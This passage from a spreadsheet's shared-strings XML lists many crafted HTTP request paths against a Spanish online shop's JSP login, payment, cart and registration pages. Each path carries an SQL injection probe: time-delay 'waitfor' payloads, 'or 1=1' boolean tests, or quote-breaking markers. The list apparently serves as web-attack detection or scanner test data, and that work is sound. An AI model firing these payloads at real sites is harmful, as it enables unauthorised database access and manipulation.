    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'injected_param&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar';waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe'injected_param&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar;waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe'injected_param&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar';waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe'injected_param&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe'injected_param&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on'injected_param&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar','0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on';waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar'injected_param&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on;waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar';waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on');waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar;waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on','0');waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on','0','0');waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar','0','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on','0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar','0','0','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar','0','0','0','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar';waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85'injected_param&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85';waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85;waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85);waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar','0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85,'0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85'injected_param&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85','0','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85';waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85,'0','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85;waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85,'0','0','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85);waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85','0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85,'0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85,'0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85','0','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar';waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85,'0','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85,'0','0','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85','0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85,'0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=confirmar','0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja';waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro'injected_param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pasar+por+caja;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro';waitfor+delay+'0:0:15';--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pasar+por+caja');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro;waitfor+delay+'0:0:15';--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pasar+por+caja','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro');waitfor+delay+'0:0:15';--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pasar+por+caja','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro','0');waitfor+delay+'0:0:15';--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pasar+por+caja','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro','0','0');waitfor+delay+'0:0:15';--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pasar+por+caja','0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro','0','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe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','0','0','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe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'injected_param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'injected_param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'injected_param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'injected_param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'injected_param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76512347c'injected_param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'injected_param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'injected_param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'injected_param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87623'injected_param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'injected_param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injected_param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;waitfor+delay+'0:0:15';--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;waitfor+delay+'0:0:15';--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);waitfor+delay+'0:0:15';--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,'0');waitfor+delay+'0:0:15';--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,'0','0');waitfor+delay+'0:0:15';--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,'0','0','0');waitfor+delay+'0:0:15';--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,'0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar+and+1=1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'+and+'1'='1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"+and+"1"="1&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarritoand1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarritoand1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarritoor1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito'and'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito'and'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito'or'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito"and"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito"and"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito"or"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito','0','0','0','0');waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1+and+1=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1'+and+'1'='1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1"+and+"1"="1&amp;id=3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+and+1=1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+and+1=2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+or+1=1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+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3+and+1=1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+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3'+and+'1'='1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'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3"+and+"1"="1&amp;nombre=vino+rioja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"+and+"1"="1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"+and+"1"="2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confirmar"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+and+1=1&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+and+1=2&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+or+1=1&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja+and+1=1&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+and+'1'='1&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja+and+1=2&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+and+'1'='2&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja+or+1=1&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+or+'1'='1&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja'+and+'1'='1&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+and+"1"="1&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja'+and+'1'='2&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+and+"1"="2&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja'+or+'1'='1&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+or+"1"="1&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja"+and+"1"="1&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja"+and+"1"="2&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja"+or+"1"="1&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar+and+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85+and+1=1&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar+and+1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85'+and+'1'='1&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar+or+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85"+and+"1"="1&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar'+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar'+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar"+and+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar"+and+"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito+and+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+and+1=1&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito+and+1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+and+1=2&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito+or+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+or+1=1&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito'+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+and+'1'='1&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito'+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+and+'1'='2&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+or+'1'='1&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito"+and+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+and+"1"="1&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito"+and+"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+and+"1"="2&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+or+"1"="1&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+and+1=1&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+and+1=2&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar+or+1=1&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+and+'1'='1&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+and+'1'='2&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar+and+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'+or+'1'='1&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar+and+1=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+and+"1"="1&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar+or+1=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+and+"1"="2&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar'+and+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar"+or+"1"="1&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar'+and+'1'='2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar'+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar"+and+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar"+and+"1"="2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar"+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on+and+1=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar+and+1=1&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on+and+1=2&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar+and+1=2&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
